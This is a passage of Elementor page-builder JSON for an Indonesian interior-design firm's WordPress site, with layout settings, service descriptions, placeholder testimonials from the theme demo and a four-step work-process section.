\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Berikut alasan banyak yang memilih Bauhaus\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",